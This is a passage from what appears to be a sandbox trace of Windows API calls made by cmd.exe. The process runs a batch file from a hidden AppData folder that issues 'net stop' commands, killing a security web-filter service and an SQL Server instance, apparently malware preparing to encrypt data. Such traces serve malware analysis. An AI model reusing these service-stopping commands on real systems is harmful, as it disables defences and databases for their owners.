lpDistanceToMoveHigh=0x0) returned 0x12fe [0210.738] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=25, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop swi_service /y\r\n/y\r\ny\r\nServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 25 [0210.739] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.739] GetFileType (hFile=0x74) returned 0x1 [0210.739] _get_osfhandle (_FileHandle=3) returned 0x74 [0210.739] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12fe [0210.739] GetProcessHeap () returned 0x3e0000 [0210.739] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0210.739] GetProcessHeap () returned 0x3e0000 [0210.739] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0210.742] _tell (_FileHandle=3) returned 4862 [0210.742] _close (_FileHandle=3) returned 0 [0210.742] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0210.742] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0210.742] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0210.742] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0210.742] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0210.742] _wcsicmp (_String1="net", _String2="CD") returned 11 [0210.742] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0210.742] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0210.742] _wcsicmp (_String1="net", _String2="REN") returned -4 [0210.742] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0210.742] _wcsicmp (_String1="net", _String2="SET") returned -5 [0210.742] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0210.742] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0210.742] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0210.743] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0210.743] _wcsicmp (_String1="net", _String2="MD") returned 1 [0210.743] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0210.743] _wcsicmp (_String1="net", _String2="RD") returned -4 [0210.743] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0210.743] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0210.743] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0210.743] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0210.743] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0210.743] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0210.743] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0210.743] _wcsicmp (_String1="net", _String2="VER") returned -8 [0210.743] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0210.743] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0210.743] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0210.743] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0210.743] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0210.743] _wcsicmp (_String1="net", _String2="START") returned -5 [0210.743] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0210.743] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0210.743] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0210.743] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0210.743] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0210.743] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0210.743] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0210.743] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0210.743] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0210.743] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0210.744] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0210.744] SetErrorMode (uMode=0x0) returned 0x1 [0210.744] GetProcessHeap () returned 0x3e0000 [0210.744] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0210.744] GetProcessHeap () returned 0x3e0000 [0210.744] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0210.744] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.744] GetProcessHeap () returned 0x3e0000 [0210.744] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0210.744] GetProcessHeap () returned 0x3e0000 [0210.744] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0210.745] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0210.745] GetProcessHeap () returned 0x3e0000 [0210.745] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0210.745] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.745] GetProcessHeap () returned 0x3e0000 [0210.745] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0210.745] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0210.745] GetProcessHeap () returned 0x3e0000 [0210.745] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0210.746] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.746] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.746] GetLastError () returned 0x2 [0210.747] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.747] GetLastError () returned 0x2 [0210.747] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.747] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.748] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.748] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.748] GetLastError () returned 0x2 [0210.748] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.749] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.749] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.749] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0210.750] SetErrorMode (uMode=0x0) returned 0x1 [0210.750] GetProcessHeap () returned 0x3e0000 [0210.750] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0210.750] GetProcessHeap () returned 0x3e0000 [0210.750] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0210.750] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.750] GetProcessHeap () returned 0x3e0000 [0210.750] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0210.750] GetProcessHeap () returned 0x3e0000 [0210.750] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0210.750] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0210.751] GetProcessHeap () returned 0x3e0000 [0210.751] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0210.751] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.751] GetProcessHeap () returned 0x3e0000 [0210.751] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0210.751] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0210.751] GetProcessHeap () returned 0x3e0000 [0210.751] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0210.751] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.752] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.752] GetLastError () returned 0x2 [0210.752] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.752] GetLastError () returned 0x2 [0210.753] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.753] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.753] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0210.754] GetLastError () returned 0x2 [0210.754] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f71c8 [0210.754] FindClose (in: hFindFile=0x3f71c8 | out: hFindFile=0x3f71c8) returned 1 [0210.755] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0210.755] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0210.755] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0210.755] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0210.755] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0210.755] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop swi_service /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop swi_service /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop swi_service /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0xa7c, dwThreadId=0x790)) returned 1 [0210.759] CloseHandle (hObject=0x74) returned 1 [0210.759] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0210.759] GetProcessHeap () returned 0x3e0000 [0210.759] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.759] GetEnvironmentStringsW () returned 0x3f8408* [0210.759] GetProcessHeap () returned 0x3e0000 [0210.759] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.760] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.760] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0210.934] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0210.934] CloseHandle (hObject=0x78) returned 1 [0210.934] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0210.934] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0210.934] GetProcessHeap () returned 0x3e0000 [0210.934] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.934] GetEnvironmentStringsW () returned 0x3f8408* [0210.935] GetProcessHeap () returned 0x3e0000 [0210.935] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.935] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.935] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0210.935] GetProcessHeap () returned 0x3e0000 [0210.935] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0210.935] GetEnvironmentStringsW () returned 0x3f8408* [0210.935] GetProcessHeap () returned 0x3e0000 [0210.935] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0210.936] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0210.936] GetProcessHeap () returned 0x3e0000 [0210.936] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0210.936] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0210.936] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.936] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0210.936] _get_osfhandle (_FileHandle=1) returned 0x264 [0210.936] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0210.936] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.936] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0210.936] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0210.936] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0210.937] SetConsoleInputExeNameW () returned 0x1 [0210.937] GetConsoleOutputCP () returned 0x1b5 [0210.937] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0210.937] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0210.937] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0210.937] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.937] SetFilePointer (in: hFile=0x78, lDistanceToMove=4862, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x12fe [0210.937] GetProcessHeap () returned 0x3e0000 [0210.937] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0210.937] GetProcessHeap () returned 0x3e0000 [0210.937] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0210.937] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0210.938] GetProcessHeap () returned 0x3e0000 [0210.938] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0210.938] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.938] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x12fe [0210.938] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x5c3, lpOverlapped=0x0) returned 1 [0210.938] SetFilePointer (in: hFile=0x78, lDistanceToMove=4893, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x131d [0210.938] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=31, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop MSSQL$PRACTICEMGT /y\r\n\nServiceΓÇ¥ /y\r\n¥ /y\r\nures\r\nnded\r\n") returned 31 [0210.939] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.939] GetFileType (hFile=0x78) returned 0x1 [0210.939] _get_osfhandle (_FileHandle=3) returned 0x78 [0210.939] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x131d [0210.939] GetProcessHeap () returned 0x3e0000 [0210.939] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3ffad8 [0210.939] GetProcessHeap () returned 0x3e0000 [0210.939] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ffad8 | out: hHeap=0x3e0000) returned 1 [0210.942] _tell (_FileHandle=3) returned 4893 [0210.942] _close (_FileHandle=3) returned 0 [0210.942] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0210.942] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0210.942] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0210.942] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0210.942] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0210.942] _wcsicmp (_String1="net", _String2="CD") returned 11 [0210.942] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0210.942] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0210.942] _wcsicmp (_String1="net", _String2="REN") returned -4 [0210.942] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0210.942] _wcsicmp (_String1="net", _String2="SET") returned -5 [0210.943] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0210.943] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0210.943] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0210.943] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0210.943] _wcsicmp (_String1="net", _String2="MD") returned 1 [0210.943] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0210.943] _wcsicmp (_String1="net", _String2="RD") returned -4 [0210.943] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0210.943] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0210.943] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0210.943] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0210.943] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0210.943] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0210.943] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0210.943] _wcsicmp (_String1="net", _String2="VER") returned -8 [0210.943] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0210.943] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0210.943] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0210.943] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0210.943] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0210.943] _wcsicmp (_String1="net", _String2="START") returned -5 [0210.943] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0210.943] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0210.943] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0210.943] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0210.943] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0210.943] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0210.943] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0210.943] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0210.943] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0210.943] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0210.944] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0210.944] SetErrorMode (uMode=0x0) returned 0x1 [0210.944] GetProcessHeap () returned 0x3e0000 [0210.944] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0210.944] GetProcessHeap () returned 0x3e0000 [0210.944] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0210.944] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0210.944] GetProcessHeap () returned 0x3e0000 [0210.944] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0210.944] GetProcessHeap () returned 0x3e0000 [0210.944] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0210.945] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0210.945] GetProcessHeap () returned 0x3e0000 [0210.945] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0210.945] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0210.945] GetProcessHeap () returned 0x3e0000 [0210.945] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0210.945] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0210.945] GetProcessHeap () returned 0x3e0000 [0210.945] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0210.946] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.946] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.946] GetLastError () returned 0x2 [0210.946] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.947] GetLastError () returned 0x2 [0210.947] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0210.947] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0210.947] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0210.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0210.948] GetLastError () returned 0x2 [0210.948] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, 